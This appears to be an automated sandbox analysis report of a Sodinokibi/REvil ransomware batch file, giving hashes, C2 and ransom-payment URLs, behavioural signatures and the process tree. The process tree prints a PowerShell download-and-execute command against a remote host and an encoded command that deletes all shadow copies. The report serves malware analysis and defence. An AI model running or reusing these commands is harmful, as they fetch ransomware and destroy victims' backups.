Analysis
-
max time kernel
149s -
max time network
168s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
06-05-2020 04:10
Static task
static1
Behavioral task
behavioral1
Sample
XxNTGzKz.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
XxNTGzKz.bat
Resource
win10v200430
General
-
Target
XxNTGzKz.bat
-
Size
190B
-
MD5
3678f90ffe3dce18e97095fe049f6cc7
-
SHA1
8e8d141ad77c44b2c8b835eacd67b039f0ee62e8
-
SHA256
3a7e391aaff6e03154e366b5df819a3d550d260df5a13e107f691b57c4811f4d
-
SHA512
1466e273b77eb1b62b58b5c39798c9a8a2ac44a1acdd3d893e2768b8a34ff4c0815004c8ab497fca8e40a6b1f65c9a6a2df4b19bdece5bf3ee9471a18b893716
Malware Config
Extracted
http://185.103.242.78/pastes/XxNTGzKz
Extracted
C:\prd6f4zrw-read-me.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/163FDCBB382B4032
http://decryptor.cc/163FDCBB382B4032
Signatures
-
Drops file in Program Files directory 22 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\microsoft sql server compact edition\prd6f4zrw-read-me.txt powershell.exe File opened for modification \??\c:\program files\RepairUninstall.doc powershell.exe File opened for modification \??\c:\program files\SelectBackup.wma powershell.exe File opened for modification \??\c:\program files\SkipStart.ex_ powershell.exe File opened for modification \??\c:\program files\UseDebug.asp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\prd6f4zrw-read-me.txt powershell.exe File created \??\c:\program files\prd6f4zrw-read-me.txt powershell.exe File created \??\c:\program files (x86)\prd6f4zrw-read-me.txt powershell.exe File opened for modification \??\c:\program files\ConnectInvoke.otf powershell.exe File opened for modification \??\c:\program files\NewLock.m4a powershell.exe File opened for modification \??\c:\program files\OptimizeUninstall.vsdx powershell.exe File opened for modification \??\c:\program files\ResumeUnregister.jfif powershell.exe File opened for modification \??\c:\program files\SetWatch.mpeg powershell.exe File opened for modification \??\c:\program files\WaitMove.rmi powershell.exe File opened for modification \??\c:\program files\SuspendLock.mp2 powershell.exe File opened for modification \??\c:\program files\TraceRemove.png powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\prd6f4zrw-read-me.txt powershell.exe File opened for modification \??\c:\program files\ConnectRevoke.pps powershell.exe File opened for modification \??\c:\program files\DisableRedo.asp powershell.exe File opened for modification \??\c:\program files\MeasureDisable.otf powershell.exe File opened for modification \??\c:\program files\RestartExit.mp4v powershell.exe File opened for modification \??\c:\program files\WatchShow.midi powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\az5wlch5i7.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1388 wrote to memory of 1472 1388 cmd.exe powershell.exe PID 1472 wrote to memory of 532 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 532 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 532 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 532 1472 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 532 powershell.exe Token: SeBackupPrivilege 1332 vssvc.exe Token: SeRestorePrivilege 1332 vssvc.exe Token: SeAuditPrivilege 1332 vssvc.exe Token: SeTakeOwnershipPrivilege 1472 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 532 powershell.exe 532 powershell.exe -
Blacklisted process makes network request 60 IoCs
Processes:
powershell.exeflow pid process 4 1472 powershell.exe 6 1472 powershell.exe 8 1472 powershell.exe 10 1472 powershell.exe 12 1472 powershell.exe 14 1472 powershell.exe 16 1472 powershell.exe 18 1472 powershell.exe 20 1472 powershell.exe 21 1472 powershell.exe 23 1472 powershell.exe 24 1472 powershell.exe 26 1472 powershell.exe 28 1472 powershell.exe 29 1472 powershell.exe 31 1472 powershell.exe 33 1472 powershell.exe 35 1472 powershell.exe 37 1472 powershell.exe 40 1472 powershell.exe 41 1472 powershell.exe 43 1472 powershell.exe 45 1472 powershell.exe 47 1472 powershell.exe 48 1472 powershell.exe 51 1472 powershell.exe 53 1472 powershell.exe 55 1472 powershell.exe 57 1472 powershell.exe 58 1472 powershell.exe 60 1472 powershell.exe 61 1472 powershell.exe 63 1472 powershell.exe 64 1472 powershell.exe 66 1472 powershell.exe 68 1472 powershell.exe 69 1472 powershell.exe 71 1472 powershell.exe 72 1472 powershell.exe 74 1472 powershell.exe 76 1472 powershell.exe 77 1472 powershell.exe 79 1472 powershell.exe 80 1472 powershell.exe 82 1472 powershell.exe 84 1472 powershell.exe 86 1472 powershell.exe 87 1472 powershell.exe 89 1472 powershell.exe 91 1472 powershell.exe 92 1472 powershell.exe 94 1472 powershell.exe 95 1472 powershell.exe 97 1472 powershell.exe 99 1472 powershell.exe 100 1472 powershell.exe 102 1472 powershell.exe 104 1472 powershell.exe 105 1472 powershell.exe 107 1472 powershell.exe -
Makes http(s) request 20 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 31 https://cheminpsy.fr/content/pics/duacxkjf.png HTTP URL 51 https://stoeferlehalle.de/uploads/pictures/zxev.png HTTP URL 89 https://homecomingstudio.com/static/graphic/juetak.gif HTTP URL 12 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 18 https://smejump.co.th/news/graphic/rpyaztgfrlviysgf.jpg HTTP URL 33 https://hannah-fink.de/admin/tmp/ulzt.png HTTP URL 43 https://educar.org/static/game/mtpbwcwipwtkwjzqdo.gif HTTP URL 8 https://jenniferandersonwriter.com/news/image/lzol.gif HTTP URL 16 https://olejack.ru/news/tmp/pxysshaktzzchm.gif HTTP URL 20 https://berliner-versicherungsvergleich.de/content/tmp/hiew.gif HTTP URL 35 https://hhcourier.com/news/tmp/ivtfjt.jpg HTTP URL 45 https://www.educar.org/ HTTP URL 74 https://fiscalsort.com/static/tmp/powerpda.jpg HTTP URL 97 https://shhealthlaw.com/include/image/syzfdnvluvuzvrbu.gif HTTP URL 4 http://185.103.242.78/pastes/XxNTGzKz HTTP URL 10 http://apps.identrust.com/roots/dstrootcax3.p7c HTTP URL 14 https://anteniti.com/include/images/jlukbh.gif HTTP URL 21 https://berliner-versicherungsvergleich.de/login/ HTTP URL 55 https://elpa.se/wp-content/graphic/qvvktgvanyfhvm.jpg HTTP URL 66 https://braffinjurylawfirm.com/news/temp/fm.jpg -
Enumerates connected drives 3 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1472 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\XxNTGzKz.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/XxNTGzKz');Invoke-HDELSZM;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Modifies system certificate store
PID:1472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:532
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1332